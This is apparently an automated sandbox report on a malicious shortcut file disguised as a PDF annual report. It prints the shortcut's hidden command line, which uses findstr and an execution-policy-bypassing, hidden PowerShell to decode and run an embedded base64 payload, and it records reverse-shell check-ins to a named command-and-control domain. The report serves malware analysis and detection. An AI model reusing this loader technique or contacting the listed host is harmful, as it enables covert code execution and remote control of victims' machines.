File name: 2023_Annual_Report.pdf.lnk

Full analysis: https://app.any.run/tasks/4b358ce5-9ea3-4e00-9f1c-080aed8a2f8a
Verdict: Malicious activity
Analysis date: December 25, 2023, 13:09:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: httpshell, shell
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Tue Nov 14 15:01:38 2023, mtime=Tue Dec 19 13:40:30 2023, atime=Tue Nov 14 15:01:38 2023, length=289792, window=hidenormalshowminimized
MD5: BBC4414D76D1A765F3D525556F616EF9
SHA1: C73E28D87FBBC8BE79ED1D421E78A41C29111A86
SHA256: 86F504DEA07FD952253904C468D83D9014A290E1FF5F2D103059638E07D14B09
SSDEEP: 768:zRxoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyG:TBWYX5Z7JsCVCbqECB7cOm0OoxUURV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Bypass execution policy to execute commands
      • powershell.exe (PID: 2056)
    • Run PowerShell with an invisible window
      • powershell.exe (PID: 2056)
    • Changes PowerShell execution policy (Bypass)
      • cmd.exe (PID: 1004)
    • HTTPSHELL has been detected (SURICATA)
      • powershell.exe (PID: 3052)
    • Connects to the CnC server
      • powershell.exe (PID: 3052)
  • SUSPICIOUS
    • Using 'findstr.exe' to search for text patterns in files and output
      • cmd.exe (PID: 1004)
      • powershell.exe (PID: 3052)
    • The process bypasses the loading of PowerShell profile settings
      • cmd.exe (PID: 1004)
    • The process hides PowerShell's copyright startup banner
      • cmd.exe (PID: 1004)
    • Starts POWERSHELL.EXE for command execution
      • powershell.exe (PID: 2056)
      • cmd.exe (PID: 1004)
    • Uses ATTRIB.EXE to modify file attributes
      • powershell.exe (PID: 3052)
    • The process hides an interactive prompt from the user
      • cmd.exe (PID: 1004)
    • Reads the Internet Settings
      • powershell.exe (PID: 3052)
    • Unusual connection from system programs
      • powershell.exe (PID: 3052)
    • PowerShell connects to the Internet
      • powershell.exe (PID: 3052)
  • INFO
    • Application launched itself
      • powershell.exe (PID: 2056)
      • AcroRd32.exe (PID: 1688)
      • RdrCEF.exe (PID: 324)
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode
FileAttributes: Archive
CreateDate: 2023:11:14 17:01:38+01:00
AccessDate: 2023:12:19 15:40:30+01:00
ModifyDate: 2023:11:14 17:01:38+01:00
TargetFileSize: 289792
IconIndex: 1
RunWindow: Show Minimized No Activate
HotKey: Control-P
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: Adobe Acrobat PDF
RelativePath: ..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "%tmp%\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "%tmp%\Temp.jpg"))) | POwERsHElL"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: desktop-3nb8rdv
Total processes: 62
Monitored processes: 11
Malicious processes: 3
Suspicious processes: 0

Behavior graph

Processes in the graph: cmd.exe, findstr.exe, powershell.exe, powershell.exe (#HTTPSHELL), findstr.exe, attrib.exe, acrord32.exe, acrord32.exe, rdrcef.exe, rdrcef.exe, rdrcef.exe

Process information

PID: 284
CMD: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --channel=1688.0.1907551168 --type=renderer "C:\Users\admin\AppData\Local\Temp\Important.pdf"
Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Parent process: AcroRd32.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe Acrobat Reader DC
Exit code: 0
Version: 15.7.20033.133275
Modules (images):
  c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\system32\kernel32.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\system32\user32.dll
  c:\windows\syswow64\kernelbase.dll
PID: 324
CMD: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"
Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: AcroRd32.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: MEDIUM
Description: Adobe RdrCEF
Exit code: 0
Version: 15.7.20033.133275
Modules (images):
  c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\system32\kernel32.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\system32\user32.dll
  c:\windows\syswow64\kernelbase.dll
PID: 980
CMD: "C:\Windows\system32\findstr.exe" /R JVBERi0xLjcNJeLjz9 2023_Annual_Report.pdf.lnk
Path: C:\Windows\System32\findstr.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Find String (QGREP) Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\findstr.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll
  c:\windows\system32\imm32.dll
PID: 1004
CMD: "C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
  c:\windows\system32\cmd.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\winbrand.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll
PID: 1412
CMD: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-delegated-renderer --disable-desktop-notifications --disable-file-system --disable-shared-workers --disable-speech-input --disable-threaded-compositing --disable-webaudio --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.7.20033 Chrome/35.0.1916.138" --disable-accelerated-compositing --disable-accelerated-video-decode --enable-software-compositing --disable-gpu-compositing --channel="324.0.1924040594\377808650" --allow-no-sandbox-job /prefetch:673131151
Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: MEDIUM
Description: Adobe RdrCEF
Exit code: 0
Version: 15.7.20033.133275
Modules (images):
  c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\system32\kernel32.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\system32\user32.dll
  c:\windows\syswow64\kernelbase.dll
PID: 1688
CMD: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\Important.pdf"
Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Parent process: powershell.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: MEDIUM
Description: Adobe Acrobat Reader DC
Exit code: 0
Version: 15.7.20033.133275
Modules (images):
  c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\system32\kernel32.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\system32\user32.dll
  c:\windows\syswow64\kernelbase.dll
PID: 2056
CMD: pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules (images):
  c:\windows\system32\windowspowershell\v1.0\powershell.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\atl.dll
  c:\windows\system32\user32.dll
PID: 2164
CMD: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-delegated-renderer --disable-desktop-notifications --disable-file-system --disable-shared-workers --disable-speech-input --disable-threaded-compositing --disable-webaudio --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.7.20033 Chrome/35.0.1916.138" --disable-accelerated-compositing --disable-accelerated-video-decode --enable-software-compositing --disable-gpu-compositing --channel="324.1.1806427502\1684383477" --allow-no-sandbox-job /prefetch:673131151
Path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: MEDIUM
Description: Adobe RdrCEF
Exit code: 0
Version: 15.7.20033.133275
Modules (images):
  c:\program files (x86)\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\system32\kernel32.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\system32\user32.dll
  c:\windows\syswow64\kernelbase.dll
PID: 2308
CMD: "C:\Windows\system32\attrib.exe" +h C:\Users\admin\Temp.jpg
Path: C:\Windows\System32\attrib.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Attribute Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\attrib.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\ulib.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll
PID: 2460
CMD: findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk
Path: C:\Windows\System32\findstr.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Find String (QGREP) Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\findstr.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll
  c:\windows\system32\imm32.dll
Total events: 5 121
Read events: 5 115
Write events: 6
Delete events: 0

Modification events

(PID) Process: (284) AcroRd32.exe
Key: HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\ExitSection
Operation: write
Name: bLastExitNormal
Value: 1

(PID) Process: (324) RdrCEF.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

Executable files: 1
Suspicious files: 26
Text files: 3
Unknown types: 0

Dropped files

PID: 3052 | Process: powershell.exe | Filename: C:\Users\admin\Temp.jpg | Type: text
MD5: 50514F94115E319477095FBEFA61257E
SHA256: 4339E02A2557B36934BAF68B6E97DAAE04A3E118DA2A66915E6200579594D8C6

PID: 3052 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\tzxyyoy0.ref.psm1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 2056 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\3u3h3gqd.mbd.ps1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 3052 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\Important.jpg | Type: text
MD5: B23FF63019946154CF0914EC6296B192
SHA256: EF98AA9EA3D3AD4396982F620C948CC6B11B8723B81BA92A3116ED6E5B0E673F

PID: 2460 | Process: findstr.exe | Filename: C:\Users\admin\AppData\Local\Temp\Temp.jpg | Type: text
MD5: 50514F94115E319477095FBEFA61257E
SHA256: 4339E02A2557B36934BAF68B6E97DAAE04A3E118DA2A66915E6200579594D8C6

PID: 284 | Process: AcroRd32.exe | Filename: C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.284 | Type: ps
MD5: 6368FFED0226094E39FE8019CF4BE4A1
SHA256: 04ED48A20FC51A155AB981884B4E81C1A9697A1CC82C05BD306BEB09FA444E8A

PID: 324 | Process: RdrCEF.exe | Filename: C:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_0 | Type: binary
MD5: CF89D16BB9107C631DAABF0C0EE58EFB
SHA256: D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E

PID: 324 | Process: RdrCEF.exe | Filename: C:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_2 | Type: binary
MD5: 0962291D6D367570BEE5454721C17E11
SHA256: EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7

PID: 324 | Process: RdrCEF.exe | Filename: C:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\index | Type: binary
MD5: E92B339388EA8E15578F1467D6A5E32E
SHA256: 7A52AA916A5D84EACE421D99376BACB28DBC70F923724488DEB53B195C57B646

PID: 324 | Process: RdrCEF.exe | Filename: C:\Users\admin\AppData\Local\Temp\scoped_dir324_12841\data_3 | Type: binary
MD5: 41876349CB12D6DB992F1309F22DF3F0
SHA256: E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
HTTP(S) requests: 3
TCP/UDP connections: 7
DNS requests: 2
Threats: 3

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3052 | powershell.exe | POST | 200 | 185.185.71.250:80 | http://pdf-online.top/api/v1/Client/Info | unknown | text | 38 b | unknown
3052 | powershell.exe | POST | 200 | 185.185.71.250:80 | http://pdf-online.top/api/v1/Client/Debug | unknown | text | 7 b | unknown
3052 | powershell.exe | GET | 200 | 185.185.71.250:80 | http://pdf-online.top/api/v1/Client/Token | unknown | text | 7.01 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
352 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
324 | RdrCEF.exe | 34.199.101.34:443 | cloud.acrobat.com | AMAZON-AES | US | unknown
3052 | powershell.exe | 185.185.71.250:80 | pdf-online.top | Sprinthost.ru LLC | RU | unknown

DNS requests

Domain | IP | Reputation
cloud.acrobat.com | 34.199.101.34, 44.198.154.229 | whitelisted
pdf-online.top | 185.185.71.250 | malicious

Threats

PID | Process | Class | Message
352 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile
3052 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain
3052 | powershell.exe | Malware Command and Control Activity Detected | SHELL [ANY.RUN] HTTP-Shell Multiplatform Reverse Shell Check-In
No debug info